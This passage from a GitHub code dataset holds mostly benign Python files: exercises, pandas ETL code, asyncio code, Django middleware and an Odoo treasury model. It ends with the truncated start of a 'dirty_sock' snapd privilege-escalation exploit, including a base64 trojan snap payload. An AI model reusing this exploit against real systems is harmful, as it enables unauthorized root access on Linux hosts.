io.imread('./taxi_zone_map_bronx.jpg')\r\nprint(image.shape)\r\nprint(image[700][1010])\r\n# RGB color for green part [201 242 208]\r\n#io.imshow(image)\r\n#io.imsave('./test.jpg',image)\r\n\r\nio.imshow(binary_img)\r\nplt.show()","repo_name":"emiyacody/Heatmap","sub_path":"Visualization.py","file_name":"Visualization.py","file_ext":"py","file_size_in_byte":2578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} {"seq_id":"25645039423","text":"# Python Exercise 28: Write a program that makes the computer \"think\" of an integer between 0 and 5 and asks the user to try to guess which number the computer picked. The program must print whether the user won or lost.\n\nfrom random import randint\nfrom time import sleep\ncomputador = randint(0, 5)\njogador = int(input('Type the number you are thinking of: '))\nprint('Processing...')\nsleep(2)\nif computador == jogador:\n    print('You won! That is exactly what I was thinking of!')\nelse:\n    print('I won! You thought of {} and I thought of {}'.format(jogador, computador))","repo_name":"MunhozRufino/estudos-python","sub_path":"exercicios/condições/ex28.py","file_name":"ex28.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} {"seq_id":"44872161518","text":"import sys\n\nnum = int(sys.stdin.readline())\n\ncount = 0\nfor i in range(num):\n    word = sys.stdin.readline().rstrip()\n    spell = []; switch = False\n    for j in range(len(word) - 1):\n        if word[j + 1] != word[j] and word[j + 1] not in spell:\n            spell.append(word[j])\n        elif word[j + 1] != word[j] and word[j + 1] in spell:\n            switch = True\n            break\n\n    if switch == False:\n        count += 1\n\nprint(count)","repo_name":"Quinsie/BOJ","sub_path":"Python/BOJ_1316_그룹 단어 체커.py","file_name":"BOJ_1316_그룹 단어 체커.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
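The BOJ 1316 record above counts "group words" — words in which every letter occurs as a single contiguous run. An equivalent formulation (my sketch, not the submitted solution) keeps a set of letters already seen and rejects a word as soon as a letter reappears after its run has ended:

```python
def is_group_word(word: str) -> bool:
    seen = set()
    prev = None
    for ch in word:
        if ch != prev and ch in seen:
            return False  # ch re-appears after an earlier run of ch ended
        seen.add(ch)
        prev = ch
    return True

words = ["happy", "new", "year", "aba"]
print(sum(is_group_word(w) for w in words))  # "aba" is not a group word -> 3
```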
{"seq_id":"8021143965","text":"import pandas as pd\nimport os \nfrom dags.ETL_S3_Postgres.Transform.Transform import Transform_df\n\nclass Transform_location_df(Transform_df):\n    def extract_var(self):\n        filePath = os.path.join(self.root_dir, \"Customers.csv\")\n        customer_df = pd.read_csv(filePath)\n\n        filePath = os.path.join(self.root_dir, \"Shipments.csv\")\n        shipment_df = pd.read_csv(filePath)\n\n        self.customer_df = customer_df[['Address','Postal code', 'City', 'State', 'Country']]\n        self.shipment_df = shipment_df['Destination']\n\n    def transform(self):\n        self.customer_df['Address_Postal_code'] = self.customer_df['Address'].astype('str') + '-' + self.customer_df['Postal code'].astype('str')\n        self.customer_df.drop(columns=['Address', 'Postal code'], inplace=True)\n\n        address_arr = [address.split(',') for address in self.shipment_df]\n\n        location_dict = {}\n        location_dict['Address'] = [address[0] for address in address_arr]\n        location_dict['Postal code'] = [address[4] for address in address_arr]\n        location_dict['City'] = [address[1] for address in address_arr]\n        location_dict['State'] = [address[2] for address in address_arr]\n        location_dict['Country'] = [address[3] for address in address_arr] \n\n        location_df = pd.DataFrame(location_dict)\n        location_df['Address_Postal_code'] = location_df['Address'].astype('str') + '-' + location_df['Postal code'].astype('str')\n        location_df.drop(columns=['Address', 'Postal code'], inplace=True)\n\n        # concat customer_df and location_df\n        self.df = pd.concat([self.customer_df, location_df])\n        self.df = self.df[['Address_Postal_code', 'City', 'State', 'Country']]\n        self.df.drop_duplicates(subset=['Address_Postal_code'], inplace=True)\n\ndef Transform_locations(Name, filePath):\n    location = Transform_location_df(Name, filePath)","repo_name":"Dctrg25/Batch_Processing","sub_path":"dags/ETL_S3_Postgres/Transform/Transform_location.py","file_name":"Transform_location.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} {"seq_id":"2351347577","text":"from collections import Counter\n\nl = [1,2,3,4,1,2,3,1,2,1]\nprint(Counter(l))\n\np = \"palabares\"\nprint(Counter(p))\n\nanimales = \"gato perro canario perro canario perro\"\nprint(Counter(animales))\n\nc = Counter(animales.split())\n\nprint(c.most_common(2))\nprint(c)\n\nl = [10,20, 30, 40, 10, 20, 30, 10, 20, 10]\nc = Counter(l)\nprint(c.items())\nprint(c.keys())\nprint(c) \n","repo_name":"Mian2912/Python","sub_path":"malla/udemy/jupyter/colecciones.py","file_name":"colecciones.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
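The location transform above splits every shipment `Destination` string positionally and then builds an `Address_Postal_code` key. Assuming the same `'Address,City,State,Country,Postal code'` layout, pandas can do the splitting in one step with `str.split(expand=True)`; a small sketch with made-up rows:

```python
import pandas as pd

destinations = pd.Series([
    "12 Main St,Springfield,IL,USA,62701",   # hypothetical sample rows
    "9 Harbour Rd,Wellington,WGN,NZ,6011",
])

# expand=True splits each string into its own column in one step
parts = destinations.str.split(',', expand=True)
parts.columns = ['Address', 'City', 'State', 'Country', 'Postal code']
parts['Address_Postal_code'] = parts['Address'] + '-' + parts['Postal code']
location_df = parts[['Address_Postal_code', 'City', 'State', 'Country']]
print(location_df)
```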
{"seq_id":"12235698701","text":"# -*- coding: utf-8 -*-\n\nimport asyncio\nimport concurrent\nimport logging\nimport pprint\nimport signal\nimport socket\nimport sys\nimport time\n\nfrom . import logic\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass EventProcessor():\n    '''Class for providing event processing for the application (uses an asyncio event loop)'''\n\n    def __init__(self, config):\n        '''Constructor'''\n        self.config = config\n        self.loop = asyncio.get_event_loop()\n        # no longer working with Python 3.10: self.queue = asyncio.Queue(loop=self.loop)\n        self.queue = asyncio.Queue(**({\"loop\": self.loop} if sys.version_info[:2] < (3, 10) else {}))\n        self.logic = logic.Logic(config, self.enqueue)\n\n    def handle_hup(self, signum, frame):\n        '''Handle the SIGHUP signal'''\n        logger.info('Signal \"SIGHUP\" received; reloading config')\n        self.logic.initialize_data()\n\n    def handle_exception(self, loop, context):\n        '''Handler for exceptions in coroutines'''\n        if isinstance(context.get('exception'), asyncio.CancelledError):\n            logger.debug('Async event loop cancelled')\n        else:\n            logging.error('Caught exception: [{e}] [{m}] [{f}]'.format(e=context.get('exception', ''), m=context.get('message'), f=context.get('future')))\n\n    def eventloop(self):\n        '''Run the event processing loop'''\n        #self.loop.set_debug(logger.getEffectiveLevel() <= logging.DEBUG)  # in case of INFO, WARN, ERROR, etc. do not go into debug mode\n        try:\n            self.loop.set_exception_handler(self.handle_exception)\n            self.loop.run_until_complete(self.run_async())\n        finally:\n            # asyncio.Task.all_tasks() was removed in Python 3.10; asyncio.all_tasks() replaces it\n            for task in asyncio.all_tasks(self.loop):\n                task.cancel()\n            self.loop.run_until_complete(self.loop.shutdown_asyncgens())\n            self.loop.close()\n\n    async def handle_message(self, reader, writer):\n        '''Process incoming messages/commands'''\n        data = await reader.read(100)\n        message = data.decode()\n        message = message.strip()\n        addr = writer.get_extra_info('peername')\n        logger.info(f'Received {message!r} from {addr!r}')\n        if message == 'quit':\n            raise KeyboardInterrupt\n        #logger.debug(f'Sending: {message!r}')\n        #writer.write(data)\n        #await writer.drain()\n        writer.close()\n\n    async def run_periodically(self, cycle_time):\n        '''Schedules tasks periodically each \"cycle_time\" (interval in seconds)'''\n        while True:\n            start = time.time()\n            await self.logic.do_periodically()\n            remaining_time = cycle_time - (time.time() - start)\n            if remaining_time <= 0:\n                logger.warning('Periodic tasks took longer than the cycle time; increase cycle time')\n            await asyncio.sleep(max(0, remaining_time))\n\n    async def enqueue(self, command, data):\n        '''Enqueues an item in the event queue'''\n        await self.queue.put({'command': command, 'data': data})\n\n    async def serve_queue(self):\n        '''Serve the event queue asynchronously'''\n        while True:\n            item = await self.queue.get()\n            await self.logic.process_queue(item)\n\n    async def run_async(self):\n        '''Asynchronously executed code'''\n        # Periodic tasks\n        cycle_time = self.config.cycle_time\n        task_periodic = asyncio.ensure_future(self.run_periodically(cycle_time))\n        # Work queue\n        task_queue = asyncio.ensure_future(self.serve_queue())\n        # Listener for receiving commands\n        #THIS IS WORKING BUT CURRENTLY NOT NEEDED\n        #server = await asyncio.start_server(self.handle_message, '127.0.0.1', 8888) \n        #addr = server.sockets[0].getsockname()\n        #print(f'Serving on {addr}')\n        #task_server = asyncio.ensure_future(server.serve_forever())\n        task_server = asyncio.ensure_future(asyncio.sleep(1)) # TEMPORARY REPLACEMENT\n        # Wait for all tasks to finish\n        await asyncio.gather(task_periodic, task_queue, task_server)\n\n\ndef run(config):\n    '''Creates an instance and runs it'''\n    evt = EventProcessor(config)\n    signal.signal(signal.SIGHUP, evt.handle_hup)\n    evt.eventloop()\n\n\nif __name__ == '__main__':\n    run()\n","repo_name":"towalink/wgtrack","sub_path":"src/wgtrack/eventprocessor.py","file_name":"eventprocessor.py","file_ext":"py","file_size_in_byte":4232,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"90"}
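`run_periodically` above implements drift-compensated scheduling: time the work, then sleep only for whatever remains of the cycle. A minimal standalone version of the pattern (the names and the `repeats` cutoff are mine); `time.monotonic()` is used here because it is immune to wall-clock adjustments:

```python
import asyncio
import time

async def every(cycle_time: float, job, repeats: int = 3):
    """Run `job` every `cycle_time` seconds, compensating for job duration."""
    for _ in range(repeats):
        start = time.monotonic()
        await job()
        remaining = cycle_time - (time.monotonic() - start)
        if remaining <= 0:
            print('warning: job took longer than the cycle time')
        await asyncio.sleep(max(0.0, remaining))

async def tick():
    print('tick', time.strftime('%H:%M:%S'))

asyncio.run(every(1.0, tick))
```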
{"seq_id":"34191215088","text":"\"\"\"Disc module.\"\"\"\nimport math\n\n\nclass Disc:\n    \"\"\"Disc.\"\"\"\n\n    def __init__(self, center, radius):\n        \"\"\"Receives information.\"\"\"\n        self.center = center if isinstance(center, tuple) else center.coords\n        self.radius = radius\n\n    def __repr__(self):\n        \"\"\"Representation of the class object.\"\"\"\n        x, y = self.center\n        r = format(self.radius**2, \".2f\")\n\n        if x == 0:\n            x_str = f\"(x)**2\"\n        elif x > 0:\n            x = format(x, \".2f\")\n            x_str = f\"(x-{x})**2\"\n        else:\n            x = format(abs(x), \".2f\")\n            x_str = f\"(x+{x})**2\"\n\n        if y == 0:\n            y_str = f\"(y)**2\"\n        elif y > 0:\n            y = format(y, \".2f\")\n            y_str = f\"(y-{y})**2\"\n        else:\n            y = format(abs(y), \".2f\")\n            y_str = f\"(y+{y})**2\"\n\n        return f\"{x_str} + {y_str} = {r}\"\n\n    def is_touching(self, near):\n        \"\"\"Checks whether discs are touching each other.\"\"\"\n        x1, y1 = self.center\n        x2, y2 = near.center\n        distance = ((x2 - x1) ** 2 + (y2 - y1) ** 2) ** 0.5\n\n        # the discs touch or overlap when the centre distance lies between\n        # the difference and the sum of the radii\n        if distance > self.radius + near.radius:\n            return False\n        if distance < abs(self.radius - near.radius):\n            return False\n        if distance == 0 and self.radius == near.radius:\n            return False\n        return True\n\n    def inscribe_discs(self):\n        \"\"\"Inscribes discs.\"\"\"\n        new_x1 = self.center[0] - 0.5 * self.radius\n        new_x2 = self.center[0] + 0.5 * self.radius\n\n        new_disc1 = Disc((new_x1, self.center[1]), self.radius * 0.5)\n        new_disc2 = Disc((new_x2, self.center[1]), self.radius * 0.5)\n\n        return new_disc1, new_disc2\n\n    def transform_disc(self, num):\n        \"\"\"Transforms this disc in place.\"\"\"\n        self.radius += num\n\n    def transformed_disc(self, num):\n        \"\"\"Returns a new, transformed disc without modifying this one.\"\"\"\n        return Disc(self.center, self.radius + num)\n\n\nclass Center:\n    \"\"\"Center of the disc.\"\"\"\n\n    def __init__(self, x, y):\n        \"\"\"Receives information.\"\"\"\n        self.coords = (x, y)\n\n    def __repr__(self):\n        \"\"\"Representation of center.\"\"\"\n        return f\"Center is x={self.coords[0]}, y={self.coords[1]}\"\n","repo_name":"vbshuliar/Programming_Projects_and_Labs_from_Ukrainian_Catholic_University","sub_path":"02/programming/exams/middle/01/disc.py","file_name":"disc.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} {"seq_id":"736742324","text":"\"\"\"\nThur Oct 31, 2019\nStacy Bridges\n\n\"\"\"\nimport re, os, sys\nimport pandas as pd\nfrom pandas import ExcelWriter\nfrom pandas import ExcelFile\nimport numpy as np\n\n# get input file\nfolder_path = os.path.dirname(os.path.abspath(__file__))\ninfile = folder_path + '\\\\db_data_org_electrical_short_wx_v1.xlsx'\noutfile = folder_path + '\\\\api_in_ids.csv'\n\n# get dataframe/column\ndf_tender = pd.read_excel(infile, sheet_name=0) # read file into dataframe\nmpns = df_tender['ManufacturerPartNo']\n\n# identify search pattern\nRS_regex = r'\\d{3}[-]\\d{3,4}'\n\n# collect the matches, echo them to the console, and write them to the output csv\nresults = []\nfor row in mpns:\n    results.append(re.findall(RS_regex,str(row)))\nwith open(outfile, 'w') as ofile:\n    ofile.write('RS Code')\n    ofile.write('\\n')\n    id_count = 0\n    for i in results:\n        if len(i)>0:\n            id_count += 1\n            print(i[0])\n            ofile.write(i[0])\n            ofile.write('\\n')\n        else:\n            ofile.write('\\n')\n\nprint('{} codes extracted and written to:'.format(id_count))\nprint(outfile)\n","repo_name":"stcybrdgs/NERS---Console-Driver","sub_path":"regex_test.py","file_name":"regex_test.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} {"seq_id":"34300926735","text":"# (Importing module item)\n# Using from module import some_item:\n\nfrom math import pow\n\nresult_1 = pow(2, 4)\nprint(\"result is \" + str(result_1))\n\nfrom math import sqrt\nresult_2 = sqrt(16)\nprint(result_2)\n\nfrom random import randint\n\nresult_3 = randint(0,100)\nprint(\"random integer from 0-100 is: \" + str(result_3))\n\nfrom random import shuffle\n\nwords = [\"car\", \"house\", \"boat\", \"bicycle\", \"plane\"]\nprint(\"List of words: \", words)\n\nshuffle(words)\nprint(\"Words after shuffling: \", words)\n\nfrom random import choice\n\nresult_4 = choice(words)\nprint(\"Random choice of words: \", result_4)","repo_name":"Sebarusci/Brown-AI-course","sub_path":"Python_Basics_4.py","file_name":"Python_Basics_4.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
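Since the basics file above prints random integers, shuffles, and choices, one habit worth pairing with it: seeding the generator makes the output reproducible, which matters as soon as such snippets are used in tests. A tiny sketch (mine, not part of the record):

```python
import random

random.seed(42)          # same seed -> same sequence on every run
a = random.randint(0, 100)
random.seed(42)
b = random.randint(0, 100)
assert a == b
print("seeded randint:", a)
```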
{"seq_id":"40238550288","text":"from typing import List\n\nclass Solution:\n    def maxProfit(self, prices: List[int]) -> int:\n        ln = len(prices)\n        if ln < 2:\n            return 0\n        prof = 0\n        has = False\n        for i in range(ln-1):\n            if prices[i] < prices[i+1] and not has:\n                has = True\n                prof -= prices[i]\n            if prices[i] > prices[i+1] and has:\n                has = False\n                prof += prices[i]\n        if has:\n            prof += prices[-1]\n        return prof","repo_name":"sergunSpb/leetcode_practice","sub_path":"122. Best Time to Buy and Sell Stock II/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"90"} {"seq_id":"11093156171","text":"from django.http import JsonResponse,HttpResponse\nfrom django.shortcuts import redirect\nfrom django.urls import reverse\nfrom django.utils.deprecation import MiddlewareMixin\nfrom APP.models import Flyuser\nREQUILE_LOGIN_JSON = [\n    # '/axf/addtocart/',\n    # '/axf/subtocart/',\n    # '/axf/changecartstate/',\n    # '/axf/makeorder/',\n\n]\nREQUILE_LOGIN = [\n    '/fly/bupi/',\n    '/fly/bed/',\n    '/fly/sign/',\n    '/fly/jiagong/',\n    '/fly/index/',\n    '/fly/',\n    '/fly/indb/',\n    '/fly/orderlist/',\n    '/fly/sendcart/',\n    '/fly/sendorderlist/',\n    '/fly/signlistbyworker/',\n    '/fly/signdetail/',\n]\n\nREQUILE_FEI = [\n    '/fly/bupi/',\n    '/fly/orderlist/',\n    '/fly/buboss/',\n    '/fly/butype/',\n    '/fly/indb/',\n\n]\n\nclass LoginMiddleware(MiddlewareMixin):\n    def process_request(self,request):\n        # if request.path in REQUILE_LOGIN_JSON:\n        #     user_id = request.session.get('user_id')\n        #     if user_id:\n        #         try:\n        #             print('haha')\n        #             user = Flyuser.objects.get(pk=user_id)\n        #             request.user = user  # attach the user to the request as an attribute\n        #         except:\n        #             print('hahaha')\n        #             data={\n        #                 'status':301,\n        #                 'msg':'user not avaliable'\n        #             }\n        #             # return redirect(reverse('axf:login')): a redirect is a browser action, so we cannot redirect straight from the middleware (i.e. the server). And since this request is fired by the js getjson call when '+' is clicked, we must return a JsonResponse\n        #             return JsonResponse(data=data)\n        #     else:\n        #         print('hahahaha')\n        #         data = {\n        #             'status': 301,\n        #             'msg': 'user not login'\n        #         }\n        #         return JsonResponse(data=data)  # if the user is not logged in, the middleware returns to the browser directly, without reaching the views\n        #         # return redirect(reverse('axf:login'))\n\n        if request.path in REQUILE_LOGIN :\n            user_id = request.session.get('user_id')\n            if user_id:\n                try:\n                    user = Flyuser.objects.get(pk=user_id)\n                    print(user.u_username)\n                    if user.u_username != 'jxb' and request.path in REQUILE_FEI:\n                        return HttpResponse(\"The current user is not allowed to view this!\")\n\n                    # request.user = user  # attach the user to the request as an attribute\n                except:\n                    return redirect(reverse('fly:login'))\n            else:\n                print('user not logged in')\n                return redirect(reverse('fly:login'))","repo_name":"JiangTaoGZU/Flypant-calculate-system","sub_path":"middleware/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":2734,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"90"}
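The `maxProfit` record above tracks buy/sell points with a flag; an equivalent way to see the same greedy argument is that the total profit equals the sum of all positive day-to-day price differences. As a compact cross-check (my sketch, not the record's code):

```python
def max_profit(prices):
    # every rising segment can be decomposed into its daily gains
    return sum(max(b - a, 0) for a, b in zip(prices, prices[1:]))

assert max_profit([7, 1, 5, 3, 6, 4]) == 7
```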
{"seq_id":"2655476372","text":"class Solution:\n    def removeElement(self, nums, val):\n        if not nums:\n            return 0\n        l = 0\n        r = len(nums) - 1\n        while l < r:\n            while l < r and nums[l] != val:\n                l += 1\n            while l < r and nums[r] == val:\n                r -= 1\n            nums[l], nums[r] = nums[r], nums[l]\n        # the problem asks for the count of remaining elements;\n        # nums[l] itself may still equal val, so count it conditionally\n        return l if nums[l] == val else l + 1","repo_name":"ffchic/leetcode","sub_path":"移除元素/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"90"} {"seq_id":"42515901597","text":"from odoo import models, fields, api, _\nfrom odoo.tools.misc import formatLang\nfrom datetime import timedelta\nfrom odoo.exceptions import UserError\n\n\nclass TreasuryForecast(models.Model):\n    _name = \"treasury.forecast\"\n    _order = \"date_start desc\"\n    _description = \"Treasury Forecast\"\n\n    # General data\n    name = fields.Char('Name', required=True)\n    active = fields.Boolean('Active', default=True)\n    statement_id = fields.Many2one(string='Statement', comodel_name='account.bank.statement')\n    state = fields.Selection([('open', 'Open'), ('closed', 'Closed')], default='open')\n    company_id = fields.Many2one(comodel_name='res.company', string='Company', required=True,\n                                 default=lambda self: self.env.user.company_id,)\n    date_start = fields.Date(string='Start Date', required=True)\n    date_end = fields.Date(string='End Date', required=True)\n    initial_balance = fields.Float(string='Initial balance', compute='compute_initial_balance',\n                                   store=True)\n    final_balance = fields.Float(string='Final balance', compute='compute_final_balance',\n                                 store=True)\n    previous_forecast_id = fields.Many2one(comodel_name='treasury.forecast', string='Previous forecast')\n    forecast_template_id = fields.Many2one(comodel_name='treasury.forecast.template', string='Forecast Template')\n    periodic_saldo = fields.Float(string='Periodic saldo', compute='_compute_periodic_saldo', store=True)\n    hide_analysis = fields.Boolean(string='Hide analysis')\n    force_initial_balance = fields.Float(string='Force initial balance')\n    set_mass_date = fields.Date(string='Set mass date')\n\n    # detailed analysis fields and text field for reporting table\n    payables = fields.Float('Payables', compute='_compute_payables', store=True)\n    open_payables = fields.Float('Open payables', compute='_compute_payables', store=True)\n    receivables = fields.Float('Receivables', compute='_compute_receivables', store=True)\n    open_receivables = fields.Float('Open receivables', compute='_compute_receivables', store=True)\n    other_flows = fields.Float('Other flows', compute='_compute_other_flows', store=True)\n    open_flows = fields.Float('Open flows', compute='_compute_other_flows', store=True)\n    forecast_analysis = fields.Text(string='Treasury Analysis', compute='_compute_periodic_saldo')\n\n    # Payables and receivables\n    receivable_ids = fields.One2many(\n        comodel_name='account.move.line', inverse_name='forecast_id',\n        domain=[('debit', '>', 0), ('journal_id.type', '!=', 'bank')],\n        string='Receivables details')\n    payable_ids = fields.One2many(\n        comodel_name='account.move.line', inverse_name='forecast_id',\n        domain=[('credit', '>', 0), ('journal_id.type', '!=', 'bank')],\n        string='Payables details')\n    recurrent_cost_ids = fields.One2many(\n        comodel_name='account.bank.statement.line', inverse_name='treasury_forecast_id',\n        string='Cost/revenues', domain=['|', ('statement_fp', '!=', True),\n                                        '&', ('statement_fp', '!=', False),\n                                        ('cf_forecast', '!=', False)], store=True)\n\n    @api.depends('payable_ids', 'payable_ids.amount_residual')\n    def _compute_payables(self):\n        for item in self:\n            total, due = 0.0, 0.0\n            for line in item.payable_ids:\n                total += line.balance\n                due += line.amount_residual\n            item.payables, item.open_payables = total, due\n\n    @api.depends('receivable_ids', 'receivable_ids.amount_residual')\n    def 
_compute_receivables(self):\n        for item in self:\n            total, due = 0.0, 0.0\n            for line in item.receivable_ids:\n                total += line.balance\n                due += line.amount_residual\n            item.receivables, item.open_receivables = total, due\n\n    @api.depends('recurrent_cost_ids', 'recurrent_cost_ids.cf_forecast',\n                 'recurrent_cost_ids.amount')\n    def _compute_other_flows(self):\n        for item in self:\n            total, due = 0.0, 0.0\n            for line in item.recurrent_cost_ids:\n                total += line.amount_main_currency\n                fp = line.statement_id.treasury_planning\n                due += line.amount_main_currency if fp else 0\n            item.other_flows, item.open_flows = total, due\n\n    @api.onchange('previous_forecast_id')\n    def _onchange_date_saldo(self):\n        for item in self:\n            if item.previous_forecast_id:\n                date_draft = fields.Date.from_string(\n                    item.previous_forecast_id.date_end) + timedelta(days=1)\n                item.update({\n                    'date_start': fields.Date.to_string(date_draft),\n                    'date_end': item.date_start,\n                    'initial_balance': item.previous_forecast_id.final_balance\n                })\n\n    def _compute_date(self, begin, end, day):\n        if day >= 0:\n            date_draft = fields.Date.from_string(begin) + timedelta(days=day-1)\n        else:\n            date_draft = fields.Date.from_string(end) + timedelta(days=day+1)\n        date = fields.Date.to_string(date_draft)\n        return date\n\n    @api.multi\n    def check_constrains(self):\n        self.ensure_one()\n        # check that there is at least one journal\n        if not self.forecast_template_id:\n            raise UserError(_(\"Please select a forecast template.\"))\n\n    @api.multi\n    def compute_forecast_lines(self):\n        for item in self:\n            self.check_constrains()\n            line_ids = []\n            for cost in item.forecast_template_id.recurring_line_ids:\n                date = self._compute_date(item.date_start, item.date_end, cost.day)\n                statement_id = item.forecast_template_id.bank_statement_id.id\n\n                line_ids.append((0, 0, {\n                    'name': cost.name,\n                    'ref': cost.ref,\n                    'partner_id': cost.partner_id.id,\n                    'treasury_date': date,\n                    'date': date,\n                    'amount': cost.amount,\n                    'cf_forecast': True,\n                    'treasury_forecast_id': item.id,\n                    'statement_id': statement_id,\n                }))\n            item.update({'recurrent_cost_ids': line_ids})\n            item.forecast_template_id = \"\"\n\n    @api.depends('payables', 'open_payables', 'receivables',\n                 'open_receivables', 'other_flows', 'open_flows')\n    def _compute_periodic_saldo(self):\n        for item in self:\n\n            item.periodic_saldo = item.open_receivables + item.open_payables + item.other_flows\n\n            # creating the forecast analysis table\n            header = (_(\"\"), _(\"Receivables\"), _(\"Payables\"), _(\"Other\"))\n            report_lines = (\n                (_(\"Total\"), item.receivables, item.payables, item.other_flows),\n                (_(\"Open\"), item.open_receivables, item.open_payables, item.open_flows)\n            )\n\n            item.forecast_analysis = self._tuple_to_table(\n                'forecast', '', header, None, report_lines)\n\n    def _tuple_to_table(self, kind, css, header, balances, report_lines):\n        if kind == 'forecast':\n            # creating the table header\n            result = \"<table class='{}'><tr>\\n\".format(css)\n            for head in header:\n                result += \"<th>{}</th>\".format(head)\n            result += \"</tr>\\n<tr>\\n\"\n            if balances:\n                for balance in balances:\n                    result += \"<td>{}</td>\".format(formatLang(\n                        self.env, balance, 2, monetary=True))\n                result += \"</tr>\\n\"\n\n            # creating single lines\n            for line in report_lines:\n                table_line = \"<tr>\"\n                for value in line:\n                    if isinstance(value, str):\n                        table_line += \"<td>{}</td>\".format(value)\n                    elif isinstance(value, float):\n                        table_line += \"<td>{}</td>\".format(\n                            formatLang(self.env, value, 2, monetary=True))\n                table_line += \"</tr>\"\n                result += table_line\n\n            result += \"</table>
\"\n return result\n\n @api.multi\n def compute_forecast_data(self):\n for item in self:\n\n # compute treasury date of all account moves\n aml_obj = self.env['account.move.line']\n move_list = aml_obj.search([\n ('treasury_planning', '!=', False),\n ('date_maturity', '>=', item.date_start),\n ('date_maturity', '<=', item.date_end),\n ('forecast_id', '=', False),\n ])\n move_list.update({'forecast_id': item.id})\n\n bank_line_obj = self.env['account.bank.statement.line']\n bank_line_list = bank_line_obj.search([\n ('date', '>=', item.date_start),\n ('date', '<=', item.date_end),\n ('treasury_forecast_id', '=', False),\n ])\n bank_line_list.update({'treasury_forecast_id': item.id})\n\n @api.depends('previous_forecast_id.final_balance', 'force_initial_balance')\n def compute_initial_balance(self):\n for item in self:\n if item.previous_forecast_id.final_balance:\n item.initial_balance = item.previous_forecast_id.final_balance\n\n if item.force_initial_balance != 0.0:\n item.initial_balance = item.force_initial_balance\n\n @api.depends('initial_balance', 'periodic_saldo')\n def compute_final_balance(self):\n for item in self:\n item.final_balance = item.initial_balance + item.periodic_saldo\n\n @api.multi\n def refresh_page(self):\n pass\n\n @api.multi\n def sett_mass_date(self):\n \"\"\"Once the month is finished we need to move all open items to the next\n forecast. We move all lines with residual different to 0 to the first day.\"\"\"\n self.ensure_one()\n if not self.set_mass_date:\n raise UserError(_(\"Please set the date to be set to all open operations.\"))\n open_moves = self.receivable_ids.filtered(lambda r: r.amount_residual != 0.0)\n open_moves += self.payable_ids.filtered(lambda r: r.amount_residual != 0.0)\n open_moves.update({'treasury_date': self.set_mass_date})\n self.set_mass_date = False\n","repo_name":"crusardi/YK","sub_path":"treasury_forecast/models/treasury_forecast.py","file_name":"treasury_forecast.py","file_ext":"py","file_size_in_byte":10464,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"8547213896","text":"#!/usr/bin/env python3\nimport string\nimport random\nimport socket\nimport base64\nimport time\nimport sys\nimport os\n\n'''\n\nORINIAL FINDER CREDITS : Chris Moberly (@init_string) from The Missing Link.\nDetails || https://initblog.com/2019/dirty-sock \nModified by @D3fa1t_ ( https://d3fa1t.ninja ) \n\n'''\n\nTROJAN_SNAP = \"\" \n\nTROJAN_BASE_SNAP = ('''\naHNxcwcAAACe5/ZcAAACAAEAAAABABEA6wEBAAQAAADYAAAAAAAAAEQHAAAAAAAAPAcAAAAAAAD/\n/////////0EFAAAAAAAAOwYAAAAAAADsBgAAAAAAAC4HAAAAAAAAIyEvYmluL2Jhc2gKCnRvdWNo\nIC9ldGMvUE9DSEFIQSAjQUF''' + 'BQUF' * 340 + 
